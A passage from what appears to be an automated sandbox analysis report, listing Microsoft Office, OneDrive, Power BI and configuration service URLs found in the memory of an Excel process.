      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://api.addins.omex.office.net/appinfo/query3e
      Source: EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://api.addins.omex.office.net/appstate/queryFgp
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://api.addins.store.office.com/addinstemplate
      Source: EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
      Source: EXCEL.EXE, 00000000.00000003.261328451.000000001320F000.00000004.00000001.sdmpString found in binary or memory: https://api.addins.store.office.com/app/queryAppStateQuery15https://api.addins.omex.office.net/appst
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://api.addins.store.office.com/app/queryl
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
      Source: D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://api.cortana.ai
      Source: EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpString found in binary or memory: https://api.cortana.aiBearer
      Source: EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpString found in binary or memory: https://api.cortana.aihttps://login.windows.net/common/oauth2/authorize
      Source: D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://api.diagnostics.office.com
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://api.diagnostics.office.com#v
      Source: EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpString found in binary or memory: https://api.diagnostics.office.comBearer
      Source: EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpString found in binary or memory: https://api.diagnostics.office.comhttps://login.windows.net/common/oauth2/authorize
      Source: EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://api.diagnosticssdf.office.comMix
      Source: EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://api.microsoftstream.com/api/
      Source: EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpString found in binary or memory: https://api.microsoftstream.com/api/StreamVideoBasehttps://web.microsoftstream.com/video/PPTQuickSta
      Source: EXCEL.EXE, 00000000.00000002.543479968.0000000012F44000.00000004.00000001.sdmpString found in binary or memory: https://api.microsoftstream.com/api/nt
      Source: D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://api.office.net
      Source: EXCEL.EXE, 00000000.00000003.463050039.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.396929162.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544045161.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263447705.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350253673.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460111881.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.459950914.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383864499.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261336835.000000001321E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383803999.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263029066.0000000013209000.00000004.00000001.sdmpString found in binary or memory: https://api.office.net$
      Source: EXCEL.EXE, 00000000.00000003.463050039.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.396929162.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544045161.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263447705.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350253673.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460111881.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.459950914.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383864499.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261336835.000000001321E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383803999.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263029066.0000000013209000.00000004.00000001.sdmpString found in binary or memory: https://api.office.net?
      Source: EXCEL.EXE, 00000000.00000003.463050039.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.396929162.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544045161.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263447705.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350253673.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460111881.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.459950914.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383864499.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261336835.000000001321E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383803999.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263029066.0000000013209000.00000004.00000001.sdmpString found in binary or memory: https://api.office.netH
      Source: EXCEL.EXE, 00000000.00000003.463050039.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.396929162.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544045161.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263447705.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350253673.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460111881.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.459950914.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383864499.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261336835.000000001321E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383803999.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263029066.0000000013209000.00000004.00000001.sdmpString found in binary or memory: https://api.office.netU
      Source: EXCEL.EXE, 00000000.00000003.463050039.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.396929162.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544045161.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263447705.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350253673.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460111881.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.459950914.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383864499.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261336835.000000001321E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383803999.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263029066.0000000013209000.00000004.00000001.sdmpString found in binary or memory: https://api.office.netf
      Source: EXCEL.EXE, 00000000.00000003.463050039.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.396929162.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544045161.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263447705.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350253673.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460111881.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.459950914.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383864499.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261336835.000000001321E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383803999.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263029066.0000000013209000.00000004.00000001.sdmpString found in binary or memory: https://api.office.neto
      Source: EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://api.onedrive.com
      Source: EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpString found in binary or memory: https://api.onedrive.comMBI
      Source: EXCEL.EXE, 00000000.00000003.396504480.0000000012FCB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.543540101.0000000012F99000.00000004.00000001.sdmpString found in binary or memory: https://api.onedrive.comce
      Source: EXCEL.EXE, 00000000.00000003.463050039.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.396929162.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544045161.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263447705.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350253673.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460111881.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.459950914.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383864499.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261336835.000000001321E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383803999.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263029066.0000000013209000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
      Source: EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets)
      Source: EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
      Source: EXCEL.EXE, 00000000.00000003.463050039.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.396929162.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544045161.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263447705.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350253673.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460111881.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.459950914.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383864499.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261336835.000000001321E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383803999.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263029066.0000000013209000.00000004.00000001.sdmpString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups-
      Source: EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groupsBearer
      Source: EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://apis.live.net/v5.0/
      Source: EXCEL.EXE, 00000000.00000003.396504480.0000000012FCB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.543540101.0000000012F99000.00000004.00000001.sdmpString found in binary or memory: https://apis.live.net/v5.0/rl
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
      Source: EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/Gzu
      Source: EXCEL.EXE, 00000000.00000003.261328451.000000001320F000.00000004.00000001.sdmpString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/OneNoteBulletinshttps://
      Source: EXCEL.EXE, 00000000.00000003.260270306.0000000012FD9000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.396504480.0000000012FCB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.543540101.0000000012F99000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://augloop.office.com
      Source: D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://augloop.office.com/v2
      Source: EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpString found in binary or memory: https://augloop.office.com/v2Bearer
      Source: EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpString found in binary or memory: https://augloop.office.com/v2https://login.windows.net/common/oauth2/authorize
      Source: EXCEL.EXE, 00000000.00000002.543540101.0000000012F99000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
      Source: EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpString found in binary or memory: https://augloop.office.comLinkRequestApiPageTitleRetrievalhttps://uci.
      Source: EXCEL.EXE, 00000000.00000003.414564418.000000000F58E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.541998187.000000000F58E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.349622287.000000000F58E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
      Source: D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://cdn.entity.
      Source: EXCEL.EXE, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
      Source: EXCEL.EXE, 00000000.00000003.349574960.000000000F536000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.411656756.000000000F537000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.414512357.000000000F537000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.541923673.000000000F537000.00000004.00000001.sdmpString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.pngW
      Source: EXCEL.EXE, 00000000.00000003.459410247.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350232384.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.397001902.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263009518.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460721096.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383781939.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263429090.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544023705.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.463256033.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
      Source: EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsellSkyDriveSignUpUpsellImageht
      Source: EXCEL.EXE, 00000000.00000003.459410247.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350232384.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.397001902.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263009518.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460721096.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383781939.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263429090.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544023705.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.463256033.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
      Source: EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsellLiveProfileServicehttps
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
      Source: D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://clients.config.office.net/
      Source: EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/Bearer
      Source: EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/https://login.windows.net/common/oauth2/authorize
      Source: D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
      Source: EXCEL.EXE, 00000000.00000003.463050039.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.396929162.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544045161.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263447705.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350253673.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460111881.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.459950914.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383864499.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261336835.000000001321E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383803999.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263029066.0000000013209000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policiesE
      Source: EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policieshttps://login.windows.net/common/oauth2/
      Source: D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
      Source: EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/iosBearer
      Source: EXCEL.EXE, 00000000.00000003.463050039.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.396929162.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544045161.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263447705.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350253673.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460111881.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.459950914.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383864499.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261336835.000000001321E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383803999.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263029066.0000000013209000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/iosU
      Source: EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/ioshttps://login.windows.net/common/oauth2/authorize
      Source: D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
      Source: EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/macBearer
      Source: EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/machttps://login.windows.net/common/oauth2/authorize
      Source: D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
      Source: EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkeyBearer
